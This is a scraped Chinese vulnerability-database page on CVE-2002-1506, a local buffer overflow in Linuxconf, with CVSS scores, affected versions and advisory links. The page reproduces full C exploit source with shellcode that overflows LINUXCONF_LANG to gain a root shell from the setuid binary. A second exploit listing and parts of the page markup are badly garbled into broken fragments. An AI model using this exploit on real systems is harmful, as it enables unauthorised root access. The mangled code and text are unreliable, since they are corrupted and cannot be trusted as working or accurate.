s/td> 3.r> .gzhl/shBrushCpp.js">

-漏洞信息 (21762)

OSV ad/21762">[点击下载] osv">.org')"ow osv">/6067/tr> 6067sp; ) Accnbs Requiredlocal 利溢式载: Inpu houtipulnerabsp;uffer Overobs seI> gurat href="http://www.exploit-解决式载:0 d="pm_bulleti/w 21762" class="pm">- d="pm_bul 21762" class="pm">- < 发 el> Unkn Unkn Unkn <口:0 d="pm_bul /w响21762" class="pm">- d="pm_bulleti/w响21762" class="pm">- ul> nuxcCVE 载] cve.mitre.org'cgi-charcvename.cgi?name=rifie1506/tr> rifie1506sp;< (seee o:下载] nvd.; .gov nvd.cfm?cvename=CVE-rifie1506/tr> NVDsp;<) /ul> nuxcBugtraq 载] x configuration utility from S/tr> om Ssp;< /ul> nuxcRelt ;)]OSV 载]/606S/tr> 606Ssp;< /ul> nuxcISS X-Fonf 载] xfonf .28.drak xfonf xf">/9980/tr> 9980sp;< /ul> nuxcMndleL Post 载] 8.0 ive.draohapsiutilit8.0 ive./bugtraq/rified /0304.html/tr> > 8.0 ive.draohapsiutilit8.0 ive./bugtraq/rified /0304.htmlsp; 8.0 ive.draohapsiutilit8.0 ive./bugtraq/rified /0305.html/tr> > 8.0 ive.draohapsiutilit8.0 ive./bugtraq/rified /0305.htmlsp;< /ul> nuxcOle r Adviset tURL 载] x conuxconf 1.25/appclanerab/poitaxs/tay? 58: PTRt; LINUXCONF_LAies/tr> > x conuxconf 1.25/appclanerab/poitaxs/tay? 58:t; LINUXCONF_LAiessp;< /ul> nuxcVendpleURL 载] x cosp;   http:tr> > x cobsp;    < /ul> nuxcKeycald 载] x cogoogl 1.25/e 8.0 ?q=iDEFENSE Sfigurat Adviset t * Te02:tr> iDEFENSE Sfigurat Adviset t * Te02sp;< /ul> ncques口:0 d="pm_bul /w 21762" class="pm">-
CVE-2002-1506
CVSS7.2
发布时间 :2003-04-02 00:00:00
修订时间 :2008-09-05 16:30:46
NMCOES    

[原文]Buffer overflow in Linuxconf before 1.28r4 allows local users to execute arbitrary code via a long LINUXCONF_LANG environment variable, which overflows an error string that is generated.


[CNNVD]Linuxconf本地环境变量缓冲区溢出漏洞。(CNNVD-200304-014)

        Linuxconf 1.28r4之前版本存在缓冲区溢出漏洞。本地用户借助超长环境变量执行任意代码。该漏洞溢出一个已产生的错误字符串。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:jacques_gelinas:linuxconf:1.2.1
cpe:/a:jacques_gelinas:linuxconf:1.2.4r4
cpe:/a:jacques_gelinas:linuxconf:1.1.8
cpe:/a:jacques_gelinas:linuxconf:1.2.3r1
cpe:/a:jacques_gelinas:linuxconf:1.1.9r1
cpe:/a:jacques_gelinas:linuxconf:1.2.1r6
cpe:/a:jacques_gelinas:linuxconf:1.2.3
cpe:/a:jacques_gelinas:linuxconf:1.2.1r2
cpe:/a:jacques_gelinas:linuxconf:1.1.6r10
cpe:/a:jacques_gelinas:linuxconf:1.1.9r2
cpe:/a:jacques_gelinas:linuxconf:1.2r2
cpe:/a:jacques_gelinas:linuxconf:1.2.1r1
cpe:/a:jacques_gelinas:linuxconf:1.28r1
cpe:/a:jacques_gelinas:linuxconf:1.2
cpe:/a:jacques_gelinas:linuxconf:1.2.1r8
cpe:/a:jacques_gelinas:linuxconf:1.27r5
cpe:/a:jacques_gelinas:linuxconf:1.2.3r2
cpe:/a:jacques_gelinas:linuxconf:1.27r4
cpe:/a:jacques_gelinas:linuxconf:1.2.1r7
cpe:/a:jacques_gelinas:linuxconf:1.2.2
cpe:/a:jacques_gelinas:linuxconf:1.2.4r5
cpe:/a:jacques_gelinas:linuxconf:1.2r1
cpe:/a:jacques_gelinas:linuxconf:1.27
cpe:/a:jacques_gelinas:linuxconf:1.2.4
cpe:/a:jacques_gelinas:linuxconf:1.2.1r5
cpe:/a:jacques_gelinas:linuxconf:1.28r2
cpe:/a:jacques_gelinas:linuxconf:1.28
cpe:/a:jacques_gelinas:linuxconf:1.2.1r3
cpe:/a:jacques_gelinas:linuxconf:1.2.4r2
cpe:/a:jacques_gelinas:linuxconf:1.28r3
cpe:/a:jacques_gelinas:linuxconf:1.1.7
cpe:/a:jacques_gelinas:linuxconf:1.2.1r4
cpe:/a:jacques_gelinas:linuxconf:1.27r3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1506
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1506
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-014
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5585
(VENDOR_ADVISORY)  BID  5585
http://www.iss.net/security_center/static/9980.php
(VENDOR_ADVISORY)  XF  linuxconf-linuxconflang-env-bo(9980)
http://archives.neohapsis.com/archives/bugtraq/2002-08/0304.html
(VENDOR_ADVISORY)  BUGTRAQ  20020828 iDEFENSE Security Advisory: Linuxconf locally exploitable buffer overflow
http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0093.html
(UNKNOWN)  VULNWATCH  20020828 iDEFENSE Security Advisory: Linuxconf locally exploitable buffer overflow
http://www.solucorp.qc.ca/changes.hc?projet=linuxconf&version=1.28r4
(UNKNOWN)  MISC  http://www.solucorp.qc.ca/changes.hc?projet=linuxconf&version=1.28r4

- 漏洞信息

Linuxconf本地环境变量缓冲区溢出漏洞。
高危 缓冲区溢出
2003-04-02 00:00:00 2005-10-20 00:00:00
本地  
        Linuxconf 1.28r4之前版本存在缓冲区溢出漏洞。本地用户借助超长环境变量执行任意代码。该漏洞溢出一个已产生的错误字符串。

- 公告与补丁

        The vendor has released a fix which addresses this issue:
        Jacques Gelinas Linuxconf 1.1.6 r10
        
        Jacques Gelinas Linuxconf 1.1.7
        
        Jacques Gelinas Linuxconf 1.1.8
        
        Jacques Gelinas Linuxconf 1.1.9 r2
        
        Jacques Gelinas Linuxconf 1.1.9 r1
        
        Jacques Gelinas Linuxconf 1.2 r1
        
        Jacques Gelinas Linuxconf 1.2 r2
        
        Jacques Gelinas Linuxconf 1.2
        
        Jacques Gelinas Linuxconf 1.2.1 r3
        
        Jacques Gelinas Linuxconf 1.2.1 r1
        
        Jacques Gelinas Linuxconf 1.2.1 r2
        
        Jacques Gelinas Linuxconf 1.2.1 r5
        
        Jacques Gelinas Linuxconf 1.2.1 r7
        
        Jacques Gelinas Linuxconf 1.2.1 r8
        
        Jacques Gelinas Linuxconf 1.2.1 r6
        
        Jacques Gelinas Linuxconf 1.2.1
        
        Jacques Gelinas Linuxconf 1.2.1 r4
        
        Jacques Gelinas Linuxconf 1.2.2
        
        Jacques Gelinas Linuxconf 1.2.3 r1
        
        Jacques Gelinas Linuxconf 1.2.3
        
        Jacques Gelinas Linuxconf 1.2.3 r2
        
        Jacques Gelinas Linuxconf 1.2.4 r2
        
        Jacques Gelinas Linuxconf 1.2.4
        
        Jacques Gelinas Linuxconf 1.2.4 r5
        
        Jacques Gelinas Linuxconf 1.2.4 r4
        
        Jacques Gelinas Linuxconf 1.27 r3
        
        Jacques Gelinas Linuxconf 1.27
        
        Jacques Gelinas Linuxconf 1.27 r5
        
        Jacques Gelinas Linuxconf 1.27 r4
        
        Jacques Gelinas Linuxconf 1.28 r3
        
        Jacques Gelinas Linuxconf 1.28 r2
        
        Jacques Gelinas Linuxconf 1.28
        
        Jacques Gelinas Linuxconf 1.28 r1
        

- 漏洞信息 (21761)

Linuxconf 1.1.x/1.2.x Local Environment Variable Buffer Overflow Vulnerability (1) (EDBID:21761)
linux local
2002-08-28 Verified
0 RaiSe
N/A [点击下载]
source: http://www.securityfocus.com/bid/5585/info

Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems.

A buffer overflow vulnerability has been reported for Linuxconf. The vulnerability is due to insufficent bounds checking of the LINUXCONF_LANG environment variable. An attacker who sets the LINUXCONF_LANG environment variable with an overly large string will be able to cause the buffer overflow condition. 

/* 
 * Linuxconf <= 1.28r3 local xploit
 * by RaiSe <raise@netsearch-ezine.com>
 * http://www.netsearch-ezine.com
 *
 * Tested on:
 *             Mandrake 8.0
 *             Mandrake 8.2
 *             RedHat   7.3
 *
 * (run without args on directory
 *  with +w)
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <asm/user.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

#define PATHLCONF	"/sbin/linuxconf"


unsigned long get_shell(void);

char shellcode[]=  // by RaiSe
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc9\x51\xb8\x38"
"\x65\x73\x68\x66\x35\x56\x4a\x50\xb8\x65\x65\x62\x69\x66\x35"
"\x4a\x4a\x50\x89\xe3\x51\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b"
"\xcd\x80";


int main(void)
{
FILE *fp;
char buf[2056], buf2[2048];
unsigned long shell, *p;
int i;


printf("\n[ Linuxconf Local Xploit by RaiSe ]\n\n");
fflush(stdout);

sprintf(buf2, "%s.eng", shellcode);

if (mkdir(buf2, S_IRWXU))
	{
	fprintf(stderr, "* Error at creat directory (.eng), +w? is it exist?, "
	                "delete it and run again.\n\n");
	exit(-1);
	}
else	
	sprintf(buf2, "%s.eng/%s.eng", shellcode, shellcode);

if ((fp = fopen(buf2, "w")) == NULL)
	{
    fprintf(stderr, "* Error at creat file,  +w?\n\n");
    exit(-1);
	}
else
	fclose(fp);

printf("* Directory + file created ..\n");
printf("   [dont forget to delete it ;)]\n");
fflush(stdout);

bzero(buf, sizeof(buf));
shell = get_shell();

p = (unsigned long *) buf;

for (i = 0; i < 2048 ; i+=4)
	*p++ = shell;


setenv("SCODE", shellcode, 1);
setenv("LINUXCONF_LANG",buf,1);
execl(PATHLCONF, "linuxconf", NULL);

exit(-1);

} /******* end of main() ******/


unsigned long get_shell(void)
{
unsigned long sc;
struct user_regs_struct regs;
int pid_vuln, n;


/* creamos un proceso */
if (!(pid_vuln = fork()))
	{
	char buf[2056];

	sleep(2);
	bzero(buf, sizeof(buf));
	memset(buf, 0x41, 2048);

	setenv("SCODE", shellcode, 1);
	setenv("LINUXCONF_LANG",buf, 1);
	execl(PATHLCONF, "linuxconf", NULL);

	fprintf(stderr, "Error: execl.\n");
	exit(-1);
	}
else
	{

	if (ptrace(PTRACE_ATTACH, pid_vuln))
		{
		fprintf(stderr, "Error: PTRACE_ATTACH.\n");
		exit(-1);
		}

	waitpid(pid_vuln, NULL, 0);

    printf("\n[* Looking at %%esp .. ]\n");
	fflush(stdout);

    if (ptrace(PTRACE_CONT, pid_vuln, 0, 0))
        {
        fprintf(stderr, "Error: PTRACE_CONT.\n");
        exit(-1);
        }

    waitpid(pid_vuln, NULL, 0);

    if (ptrace(PTRACE_GETREGS, pid_vuln, 0, &regs))
        {
        fprintf(stderr, "Error: PTRACE_GETREGS.\n");
        exit(-1);
        }

	printf("[* Looking at: 0x%08x ]\n", (int) regs.esp);
    fflush(stdout);

	n = 0, sc = 0;

	do 
		{
	    if ((sc = ptrace(PTRACE_PEEKTEXT, pid_vuln,
			 (int)(regs.esp+(n++)), 0)) == -1)
	        {
	        fprintf(stderr, "Error: PTRACE_PEEKTEXT.\n");
	        exit(-1);
    	    }

		} while (sc != 0x90909090);
	
	n--;
	printf("[* Shellcode found at: 0x%08x ]\n", (int)(regs.esp + n));
	fflush(stdout);

	if(ptrace(PTRACE_KILL, pid_vuln, 0, 0))
		{
		fprintf(stderr, "Error: PTRACE_KILL.\n");
		exit(-1);
		}
	else
		{
		waitpid(pid_vuln, NULL, 0);
		printf("[* Xploting .. ]\n\n");
		fflush(stdout);
		sleep(1);
		return((unsigned long)(regs.esp + n));
		}
	}

} /********* enf of get_shell() **********/


/* EOF */
		

- 漏洞信息 (21762)

Linuxconf 1.1.x/1.2.x Local Environment Variable Buffer Overflow Vulnerability (2) (EDBID:21762)
linux local
2002-08-28 Verified
0 David Endler
N/A [点击下载]
source: http://www.securityfocus.com/bid/5585/info
 
Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems.
 
A buffer overflow vulnerability has been reported for Linuxconf. The vulnerability is due to insufficent bounds checking of the LINUXCONF_LANG environment variable. An attacker who sets the LINUXCONF_LANG environment variable with an overly large string will be able to cause the buffer overflow condition. 

/*
 * This is an exploit for the linuxconf overflow issue.
 *
 * The detail of this hole was published on 08.28.2002 by
 * David Endler from www.idefense.com. 
 *
 * Tested to work on Redhat 7.0 with linuxconf 1.25r3.
 * [The magic numbers that worked for me are: 980 500 2048 1]
 *
 * This is a classical example of stack smashing. L 980 5r36 t bo    3"his is a classical example of stack smashing. L 980 5r36 t bo    3"d/is  con( INUX}

3as .ty ,r burflenvironmehim02 by
 * Fla ofple.25ause gop;&no: jinyean@hotmndl1.253.
 * [Tinclude <sys/ptractypes.h>
#include <


unsigned long geDEFAULT_ALIGN		0ed long geDEFAULT_OFFSET		0ed long geDEFAULT_BUFFER_SIZE	k sed long geDEFAULT_EGG_SIZE	ng. ed long geNOP fp: 0xx90\x90\x90\x90";'>
sourcar buf[2eb\x1f\x5e;;

76\x09(void)
{
88x66\x308;;
");>
sourcar buf[26\x30d{
FILE ;;

ft;;
d{
4e\x09(v
d{
5\x30d");>
sourcar buf[25\x56\x4a\x5d ;;

d8x660[25\x56\x4e8x6dc
ff");>
sourcar buf[2ff[2ff/charstabuf2[2048];
 user_regs_struct ***
int n&quo__asm__leep(1)movl ACE_,%eaxd long)(reF */
ned luln shic,r 90\x*shiv[] n&quo 90\x*r thby Rtels*egg

ell;
sp;&_Rtelssp;&

uln off la=DEFAULT_OFFSET, bCODE=DEFAULT_BUFFER_SIZE

uln i, eggCODE=DEFAULT_EGG_SIZE,     
sourc		pri0		{
		f{
sp;&=uct ***
)-off laint)(regs.esp + nUsut);
p;&nbs

	xrace(PTRA
p;&))
          Rte=1);f;{
sp;&_Rte=(ell;

r, &+    <(-1);
	"=ODE&e &lbCODElcode, 		 (i*(sp;&_Rte++)=sp;&

nt)(te=egg

;
	"=ODE&e &leggCODE- 
len(L)
	{
  -1lcod+)	 (i*(Rte++)=NOP

;
	"=ODE&e &l 
len(L)
	{
  lcod+)	 (i*(Rte++)=90\x90&quoix41, 201);f[bCODE-1]='\0'id_vugg[eggCODE-1]='\0'id_hellcocpy(egg,e
		{
GG=ce(PTRA4		{
pu &quoegg shellcocpy(r thbt;linuxconf", N=ce(PTRA15		{
pu &quor thintf(stderrid);

char shellcode[]=  ,or: execl.\n");
exit(-1);
}axhl/shBrushCpp.js">

Plot;%n id="pm_info_edb21762" class="pm">- 3漏洞信息 (21762)

3
3 3linux 3
Linuxconf 1.1.x/1.2.x Local Environment Variable Buffer Overflow Vulnerability (2) (EDBID:21762)
local
2002-08-28 Verified 0 David Endler
N/A [点击下载]
source: http://www.securityfocus.com/bont-d/5585/info
 
Linuxconf is a Linux configuration utility from Solucorp.. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems.
 
A buffer overflow vulnerability has been reported for Linnuxconf. The vulnerability is due to insufficent bounds checking of the LINUXCONF_LANG environment variable. An attacker who sets the LINUXCONF_LANG environment variable with an overly large string will be able to cause the buffer overflow condition. 

/*
 * This is an exploit for the linuxconf overflow issue.>
		
        
linux
0 linux Veel> rified <
0
linux
linux